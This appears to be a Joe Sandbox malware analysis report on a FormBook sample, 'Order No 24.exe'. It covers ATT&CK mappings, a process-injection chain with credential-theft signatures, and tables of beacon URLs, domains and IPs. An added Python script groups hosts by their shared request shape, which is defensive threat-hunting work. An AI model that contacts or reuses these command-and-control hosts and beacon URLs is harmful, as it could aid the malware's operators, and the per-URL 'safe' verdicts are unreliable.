Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Order No 24.exe | Code function: 0_2_009D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix

One line per tactic, listing the techniques in that column of the report's matrix. A number in parentheses is the signature-count badge the report shows for that technique (multi-digit badges are reproduced as extracted); techniques without a number were not triggered by this sample.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: Valid Accounts (2), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Native API (3), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: DLL Side-Loading (1), Valid Accounts (2), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Exploitation for Privilege Escalation (1), Abuse Elevation Control Mechanism (1), DLL Side-Loading (1), Valid Accounts (2), Access Token Manipulation (21), Process Injection (412), Startup Items, Scheduled Task/Job, At
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Abuse Elevation Control Mechanism (1), Obfuscated Files or Information (3), DLL Side-Loading (1), Valid Accounts (2), Virtualization/Sandbox Evasion (2), Access Token Manipulation (21), Process Injection (412)
Credential Access: OS Credential Dumping (1), Input Capture (21), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2), Account Discovery (1), File and Directory Discovery (2), System Information Discovery (116), Security Software Discovery (151), Virtualization/Sandbox Evasion (2), Process Discovery (3), Application Window Discovery (11), System Owner/User Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Input Capture (21), Clipboard Data (3), GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Command and Control: Ingress Tool Transfer (4), Encrypted Channel (1), Non-Application Layer Protocol (4), Application Layer Protocol (4), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Behavior Graph (ID: 1557782; sample: Order No 24.exe; start date: 18/11/2024; architecture: WINDOWS; score: 100)

Process chain, with the signatures and network contacts the graph attaches to each node (bracketed numbers are the graph's per-node counters as extracted):

Start
    Domains: www.066bet.xyz (Performs DNS queries to domains with low reputation); www.yushaliu.online; 20 other IPs or domains
    Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures
  -> Order No 24.exe [2] (started)
       Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
         Signatures: Maps a DLL or memory area into another process
      -> vqiDHNHvZuv.exe (injected)
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> net.exe [13] (started)
             Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          -> vqiDHNHvZuv.exe (injected)
               Network: www.pluribiz.life 209.74.64.58, ports 49994, 49995, 49996 (MULTIBAND-NEWHOPEUS, United States); ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, ports 50024, 50025, 50026 (LEASEWEB-UK-LON-11GB, United Kingdom); 7 other IPs or domains
               Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          -> firefox.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label | Link
Order No 24.exe | 34% | ReversingLabs | Win32.Trojan.AutoitInject
Order No 24.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://www.vehiculargustav.click/95c0/ | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=4nk.education | 0% | Avira URL Cloud | safe
http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.online | 0% | Avira URL Cloud | safe
http://www.bio-thymus.com/ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp | 0% | Avira URL Cloud | safe
http://www.wukong.college/9ezc/ | 0% | Avira URL Cloud | safe
http://www.4nk.education/gnvu/ | 100% | Avira URL Cloud | malware
http://www.kdtzhb.top/1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp | 0% | Avira URL Cloud | safe
http://www.evoo.website/293d/ | 0% | Avira URL Cloud | safe
http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns | 0% | Avira URL Cloud | safe
http://www.Yushaliu.online | 0% | Avira URL Cloud | safe
http://www.marketprediction.app/ucmb/ | 0% | Avira URL Cloud | safe
http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp | 100% | Avira URL Cloud | malware
http://www.bio-thymus.com/ezyn/ | 0% | Avira URL Cloud | safe
http://www.fiqsth.vip/0m8a/ | 0% | Avira URL Cloud | safe
http://www.yushaliu.online/fjsq/ | 0% | Avira URL Cloud | safe
http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp | 100% | Avira URL Cloud | malware
http://www.pluribiz.life/afcr/ | 0% | Avira URL Cloud | safe
http://www.fiqsth.vip/0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp | 0% | Avira URL Cloud | safe
http://www.marketprediction.app | 0% | Avira URL Cloud | safe
http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp | 100% | Avira URL Cloud | malware
http://www.astorg-group.info/vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp | 0% | Avira URL Cloud | safe
http://www.kdtzhb.top/1iqa/ | 0% | Avira URL Cloud | safe
http://www.wukong.college/9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= | 0% | Avira URL Cloud | safe
http://www.migraine-massages.pro/ym43/ | 100% | Avira URL Cloud | malware
http://www.yushaliu.online/fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp | 0% | Avira URL Cloud | safe
http://www.astorg-group.info/vdvc/ | 0% | Avira URL Cloud | safe
https://whois.gandi.net/en/results?search=astorg-group.info | 0% | Avira URL Cloud | safe
http://www.marketprediction.app/ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= | 0% | Avira URL Cloud | safe
Domains and IPs

Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | - | high
www.evoo.website | 128.65.195.180 | true | false | - | high
fiqsth.vip | 3.33.130.190 | true | false | - | unknown
www.wukong.college | 47.52.221.8 | true | false | - | high
marketprediction.app | 3.33.130.190 | true | false | - | unknown
www.yushaliu.online | 208.91.197.27 | true | false | - | unknown
bio-thymus.com | 3.33.130.190 | true | false | - | unknown
www.pluribiz.life | 209.74.64.58 | true | false | - | high
www.kdtzhb.top | 47.242.89.146 | true | false | - | high
corpseflowerwatch.org | 3.33.130.190 | true | false | - | unknown
www.migraine-massages.pro | 199.59.243.227 | true | false | - | high
ppp84k45ss7ehy8ypic5x.limelightcdn.com | 23.106.59.18 | true | false | - | unknown
www.bulls777.pro | unknown | unknown | false | - | unknown
www.astorg-group.info | unknown | unknown | false | - | unknown
www.bio-thymus.com | unknown | unknown | false | - | unknown
www.marketprediction.app | unknown | unknown | false | - | unknown
www.fiqsth.vip | unknown | unknown | false | - | unknown
www.vehiculargustav.click | unknown | unknown | false | - | unknown
www.corpseflowerwatch.org | unknown | unknown | false | - | unknown
www.vnxoso88.art | unknown | unknown | false | - | high
www.066bet.xyz | unknown | unknown | true | - | unknown
www.4nk.education | unknown | unknown | false | - | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.4nk.education/gnvu/ | false | Avira URL Cloud: malware | unknown
http://www.evoo.website/293d/ | false | Avira URL Cloud: safe | unknown
http://www.kdtzhb.top/1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: safe | unknown
http://www.vehiculargustav.click/95c0/ | false | Avira URL Cloud: safe | unknown
http://www.wukong.college/9ezc/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: safe | unknown
http://www.yushaliu.online/fjsq/ | false | Avira URL Cloud: safe | unknown
http://www.pluribiz.life/afcr/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/ | false | Avira URL Cloud: safe | unknown
http://www.marketprediction.app/ucmb/ | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: safe | unknown
http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: malware | unknown
http://www.astorg-group.info/vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/ | false | Avira URL Cloud: safe | unknown
http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: malware | unknown
http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: malware | unknown
http://www.kdtzhb.top/1iqa/ | false | Avira URL Cloud: safe | unknown
http://www.migraine-massages.pro/ym43/ | false | Avira URL Cloud: malware | unknown
http://www.astorg-group.info/vdvc/ | false | Avira URL Cloud: safe | unknown
http://www.wukong.college/9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= | false | Avira URL Cloud: safe | unknown
http://www.yushaliu.online/fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp | false | Avira URL Cloud: safe | unknown
http://www.marketprediction.app/ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= | false | Avira URL Cloud: safe | unknown
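Two things in the URL tables above are a better hunting pivot than the per-URL verdicts. Every full request, whatever the host, carries the same token 92=DPyPNvf84fs0yXSp next to a base64-looking bdlD value, and every host is contacted under a four-character directory (/gnvu/, /1iqa/, /9ezc/, /ym43/, /afcr/ and so on), while Avira rates most of those hosts "safe" and four of them resolve to the same address, 3.33.130.190, alongside a gandi web-redirect host and an "under construction" notice page. The following Python is an added example, not part of the Joe Sandbox report: it checks URLs against that observed request shape and groups the hosts that match. The regexes describe only what this report shows, not a general FormBook signature, and the URL list is a hand-copied subset of the table.

```python
"""Pivot on the request shape shared by the URLs in the report's tables.
Added example, not Joe Sandbox code; REPORT_URLS is a hand-copied subset."""
import re
from urllib.parse import urlsplit

# URL -> Avira URL Cloud verdict, copied from the report's URL table.
REPORT_URLS = {
    "http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp": "malware",
    "http://www.kdtzhb.top/1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp": "safe",
    "http://www.wukong.college/9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA=": "safe",
    "http://www.migraine-massages.pro/ym43/": "malware",
    "http://www.pluribiz.life/afcr/": "safe",
    "http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns": "safe",
    "https://whois.gandi.net/en/results?search=4nk.education": "safe",
}

# Shape observed across the beacon-like rows of this report: a four-character
# directory, and either no query or exactly a base64-looking "bdlD" plus a
# 16-character "92" (order varies). Derived from the table, not a family signature.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{16}$")


def split_query(query):
    """Split a query string without percent/plus decoding: '+' and '/' are payload here."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def classify(url):
    """Return host, whether the URL matches the observed beacon shape, and its '92' token."""
    parts = urlsplit(url)
    params = split_query(parts.query)
    shape_ok = PATH_RE.match(parts.path) is not None and (
        not params
        or (set(params) == {"bdlD", "92"}
            and B64_RE.match(params["bdlD"]) is not None
            and TOKEN_RE.match(params["92"]) is not None)
    )
    return {"host": parts.hostname, "beacon": shape_ok, "token": params.get("92")}


def pivot(url_verdicts):
    """Group beacon-shaped URLs: their hosts, the tokens they share, and the hosts
    that URL reputation did not flag (the ones a verdict-only triage would miss)."""
    hosts, tokens, unflagged = set(), set(), set()
    for url, verdict in url_verdicts.items():
        info = classify(url)
        if not info["beacon"]:
            continue
        hosts.add(info["host"])
        if info["token"]:
            tokens.add(info["token"])
        if verdict != "malware":
            unflagged.add(info["host"])
    return {"hosts": hosts, "tokens": tokens, "unflagged": unflagged}


if __name__ == "__main__":
    result = pivot(REPORT_URLS)
    print("beacon-shaped hosts:", sorted(result["hosts"]))
    print("shared 92= tokens:", sorted(result["tokens"]))
    print("not flagged by reputation:", sorted(result["unflagged"]))
```

On the subset above the five beacon-shaped hosts share a single token and three of them carry a "safe" verdict, while the whois and parked-page URLs fall out as non-matching. The design point is that the query is parsed without URL decoding: parse_qs would turn the '+' characters inside bdlD into spaces and break the base64 check, so the split is done on '&' and the first '=' only.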
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://dts.gnpge.com | vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://cdn.consentmanager.net | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://whois.gandi.net/en/results?search=4nk.education | net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.online | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.Yushaliu.online | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | net.exe, 00000004.00000002.4578877580.0000000003C18000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003438000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/pics/29590/bg1.png) | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/pics/28903/search.png) | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/pics/28905/arrrow.png) | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://delivery.consentmanager.net | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmp | false
                                                                                              high
                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.marketprediction.appvqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.gandi.net/en/domainnet.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://www.ecosia.org/newtab/net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://whois.gandi.net/en/results?search=astorg-group.infonet.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://ac.ecosia.org/autocomplete?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
